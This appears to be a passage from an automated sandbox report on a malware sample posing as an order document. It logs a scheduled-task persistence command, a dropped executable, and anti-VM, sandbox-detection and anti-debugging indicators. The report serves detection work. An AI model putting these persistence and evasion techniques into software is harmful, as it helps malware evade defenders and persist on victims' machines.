Source: C:\Windows\explorer.exe	Code function: 7_2_06FE4FDA pushad ; ret	7_2_06FE4FE8
Source: C:\Windows\explorer.exe	Code function: 7_2_06FE29CB push edx; retf	7_2_06FE29E4
Source: C:\Windows\explorer.exe	Code function: 7_2_06FE295D push edx; retf	7_2_06FE29E4
Source: C:\Windows\explorer.exe	Code function: 7_2_06FE015B push ebp; iretd	7_2_06FE015C
Source: C:\Windows\explorer.exe	Code function: 7_2_06FE2556 push 9A36B996h; iretd	7_2_06FE255E
Source: C:\Windows\explorer.exe	Code function: 7_2_06FE1F37 push edx; ret	7_2_06FE1F38
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0559D0D1 push ecx; ret	16_2_0559D0E4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00BBC9A6 pushfd ; ret	16_2_00BBC9A7
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00BA7206 push es; retf	16_2_00BA7209
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00BBB3A5 push eax; ret	16_2_00BBB3F8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00BBB3FB push eax; ret	16_2_00BBB462
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00BBB3F2 push eax; ret	16_2_00BBB3F8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00BACC22 pushad ; retf	16_2_00BACC2C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00BBB45C push eax; ret	16_2_00BBB462
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00BB5597 push ss; retf	16_2_00BB5598

Source: initial sample	Static PE information: section name: .text entropy: 7.43400315564
Source: initial sample	Static PE information: section name: .text entropy: 7.43400315564

Persistence and Installation Behavior:

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe

File created: C:\Users\user\AppData\Roaming\LvZiFDk.exe

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp'

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ORDER SPECIFICATIONS.exe PID: 6336, type: MEMORY
Source: Yara match	File source: 0.2.ORDER SPECIFICATIONS.exe.2b26b2c.1.raw.unpack, type: UNPACKEDPE

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe	RDTSC instruction interceptor: First address: 0000000000BA85E4 second address: 0000000000BA85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe	RDTSC instruction interceptor: First address: 0000000000BA896E second address: 0000000000BA8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe

Code function: 5_2_004088A0 rdtsc

5_2_004088A0

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe TID: 6340	Thread sleep time: -102106s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe TID: 6356	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5848	Thread sleep time: -45000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 768	Thread sleep time: -44000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\chkdsk.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\chkdsk.exe	Last function: Thread delayed

Source: explorer.exe, 00000007.00000000.278443564.000000000891C000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000007.00000002.504681708.0000000003710000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.277633777.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000007.00000002.504750935.0000000003767000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000007.00000000.259001447.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000007.00000000.278684263.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000007.00000000.277633777.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000007.00000002.511293528.00000000053D7000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000007.00000000.277633777.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000007.00000000.278684263.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000007.00000000.277633777.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe

Code function: 5_2_004088A0 rdtsc

5_2_004088A0

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe

Code function: 5_2_00409B10 LdrLoadDll,

5_2_00409B10

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014EB944 mov eax, dword ptr fs:[00000030h]	5_2_014EB944
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014EB944 mov eax, dword ptr fs:[00000030h]	5_2_014EB944
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014CC962 mov eax, dword ptr fs:[00000030h]	5_2_014CC962
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014CB171 mov eax, dword ptr fs:[00000030h]	5_2_014CB171
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014CB171 mov eax, dword ptr fs:[00000030h]	5_2_014CB171
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C9100 mov eax, dword ptr fs:[00000030h]	5_2_014C9100
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C9100 mov eax, dword ptr fs:[00000030h]	5_2_014C9100
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C9100 mov eax, dword ptr fs:[00000030h]	5_2_014C9100
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014E4120 mov eax, dword ptr fs:[00000030h]	5_2_014E4120
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014E4120 mov eax, dword ptr fs:[00000030h]	5_2_014E4120
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014E4120 mov eax, dword ptr fs:[00000030h]	5_2_014E4120
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014E4120 mov eax, dword ptr fs:[00000030h]	5_2_014E4120
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014E4120 mov ecx, dword ptr fs:[00000030h]	5_2_014E4120
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F513A mov eax, dword ptr fs:[00000030h]	5_2_014F513A
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F513A mov eax, dword ptr fs:[00000030h]	5_2_014F513A
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014CB1E1 mov eax, dword ptr fs:[00000030h]	5_2_014CB1E1
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014CB1E1 mov eax, dword ptr fs:[00000030h]	5_2_014CB1E1
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014CB1E1 mov eax, dword ptr fs:[00000030h]	5_2_014CB1E1
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015541E8 mov eax, dword ptr fs:[00000030h]	5_2_015541E8
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014FA185 mov eax, dword ptr fs:[00000030h]	5_2_014FA185
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014EC182 mov eax, dword ptr fs:[00000030h]	5_2_014EC182
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F2990 mov eax, dword ptr fs:[00000030h]	5_2_014F2990
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015451BE mov eax, dword ptr fs:[00000030h]	5_2_015451BE
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015451BE mov eax, dword ptr fs:[00000030h]	5_2_015451BE
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015451BE mov eax, dword ptr fs:[00000030h]	5_2_015451BE
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015451BE mov eax, dword ptr fs:[00000030h]	5_2_015451BE
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F61A0 mov eax, dword ptr fs:[00000030h]	5_2_014F61A0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F61A0 mov eax, dword ptr fs:[00000030h]	5_2_014F61A0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015469A6 mov eax, dword ptr fs:[00000030h]	5_2_015469A6
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015849A4 mov eax, dword ptr fs:[00000030h]	5_2_015849A4
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015849A4 mov eax, dword ptr fs:[00000030h]	5_2_015849A4
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015849A4 mov eax, dword ptr fs:[00000030h]	5_2_015849A4
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015849A4 mov eax, dword ptr fs:[00000030h]	5_2_015849A4
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014E0050 mov eax, dword ptr fs:[00000030h]	5_2_014E0050
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014E0050 mov eax, dword ptr fs:[00000030h]	5_2_014E0050
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01582073 mov eax, dword ptr fs:[00000030h]	5_2_01582073
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01591074 mov eax, dword ptr fs:[00000030h]	5_2_01591074
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01547016 mov eax, dword ptr fs:[00000030h]	5_2_01547016
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01547016 mov eax, dword ptr fs:[00000030h]	5_2_01547016
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01547016 mov eax, dword ptr fs:[00000030h]	5_2_01547016
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01594015 mov eax, dword ptr fs:[00000030h]	5_2_01594015
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01594015 mov eax, dword ptr fs:[00000030h]	5_2_01594015
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F002D mov eax, dword ptr fs:[00000030h]	5_2_014F002D
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F002D mov eax, dword ptr fs:[00000030h]	5_2_014F002D
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F002D mov eax, dword ptr fs:[00000030h]	5_2_014F002D
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F002D mov eax, dword ptr fs:[00000030h]	5_2_014F002D
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F002D mov eax, dword ptr fs:[00000030h]	5_2_014F002D
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014DB02A mov eax, dword ptr fs:[00000030h]	5_2_014DB02A
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014DB02A mov eax, dword ptr fs:[00000030h]	5_2_014DB02A
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014DB02A mov eax, dword ptr fs:[00000030h]	5_2_014DB02A
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014DB02A mov eax, dword ptr fs:[00000030h]	5_2_014DB02A
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0155B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0155B8D0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0155B8D0 mov ecx, dword ptr fs:[00000030h]	5_2_0155B8D0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0155B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0155B8D0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0155B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0155B8D0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0155B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0155B8D0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0155B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0155B8D0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C58EC mov eax, dword ptr fs:[00000030h]	5_2_014C58EC
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C40E1 mov eax, dword ptr fs:[00000030h]	5_2_014C40E1
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C40E1 mov eax, dword ptr fs:[00000030h]	5_2_014C40E1
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C40E1 mov eax, dword ptr fs:[00000030h]	5_2_014C40E1
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C9080 mov eax, dword ptr fs:[00000030h]	5_2_014C9080
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01543884 mov eax, dword ptr fs:[00000030h]	5_2_01543884
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01543884 mov eax, dword ptr fs:[00000030h]	5_2_01543884
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F20A0 mov eax, dword ptr fs:[00000030h]	5_2_014F20A0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F20A0 mov eax, dword ptr fs:[00000030h]	5_2_014F20A0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F20A0 mov eax, dword ptr fs:[00000030h]	5_2_014F20A0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F20A0 mov eax, dword ptr fs:[00000030h]	5_2_014F20A0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F20A0 mov eax, dword ptr fs:[00000030h]	5_2_014F20A0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F20A0 mov eax, dword ptr fs:[00000030h]	5_2_014F20A0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014FF0BF mov ecx, dword ptr fs:[00000030h]	5_2_014FF0BF
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014FF0BF mov eax, dword ptr fs:[00000030h]	5_2_014FF0BF
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014FF0BF mov eax, dword ptr fs:[00000030h]	5_2_014FF0BF
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015090AF mov eax, dword ptr fs:[00000030h]	5_2_015090AF
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01598B58 mov eax, dword ptr fs:[00000030h]	5_2_01598B58
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014CDB40 mov eax, dword ptr fs:[00000030h]	5_2_014CDB40
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014CF358 mov eax, dword ptr fs:[00000030h]	5_2_014CF358
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014CDB60 mov ecx, dword ptr fs:[00000030h]	5_2_014CDB60
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F3B7A mov eax, dword ptr fs:[00000030h]	5_2_014F3B7A
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F3B7A mov eax, dword ptr fs:[00000030h]	5_2_014F3B7A
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0158131B mov eax, dword ptr fs:[00000030h]	5_2_0158131B
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015453CA mov eax, dword ptr fs:[00000030h]	5_2_015453CA
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015453CA mov eax, dword ptr fs:[00000030h]	5_2_015453CA
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014EDBE9 mov eax, dword ptr fs:[00000030h]	5_2_014EDBE9
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F03E2 mov eax, dword ptr fs:[00000030h]	5_2_014F03E2
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F03E2 mov eax, dword ptr fs:[00000030h]	5_2_014F03E2
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F03E2 mov eax, dword ptr fs:[00000030h]	5_2_014F03E2
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F03E2 mov eax, dword ptr fs:[00000030h]	5_2_014F03E2
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F03E2 mov eax, dword ptr fs:[00000030h]	5_2_014F03E2
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F03E2 mov eax, dword ptr fs:[00000030h]	5_2_014F03E2
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D1B8F mov eax, dword ptr fs:[00000030h]	5_2_014D1B8F
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D1B8F mov eax, dword ptr fs:[00000030h]	5_2_014D1B8F
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0158138A mov eax, dword ptr fs:[00000030h]	5_2_0158138A
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0157D380 mov ecx, dword ptr fs:[00000030h]	5_2_0157D380
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F2397 mov eax, dword ptr fs:[00000030h]	5_2_014F2397
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014FB390 mov eax, dword ptr fs:[00000030h]	5_2_014FB390
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F4BAD mov eax, dword ptr fs:[00000030h]	5_2_014F4BAD
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F4BAD mov eax, dword ptr fs:[00000030h]	5_2_014F4BAD
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F4BAD mov eax, dword ptr fs:[00000030h]	5_2_014F4BAD
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01595BA5 mov eax, dword ptr fs:[00000030h]	5_2_01595BA5
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01554257 mov eax, dword ptr fs:[00000030h]	5_2_01554257
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C9240 mov eax, dword ptr fs:[00000030h]	5_2_014C9240
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C9240 mov eax, dword ptr fs:[00000030h]	5_2_014C9240
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C9240 mov eax, dword ptr fs:[00000030h]	5_2_014C9240
